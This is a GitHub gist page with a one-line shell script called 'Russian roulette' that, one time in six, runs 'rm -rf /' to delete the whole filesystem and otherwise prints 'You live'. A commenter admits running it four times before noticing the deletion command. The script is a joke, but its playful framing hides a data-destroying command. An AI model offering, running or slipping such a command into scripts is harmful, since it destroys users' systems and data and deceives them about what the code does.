Russian roulette ;-)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf / || echo “You live” |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
OMG, tried 4 times before figured out that it actually contains rm -rf /
(the first thought was it just prints "win/loose" to screen)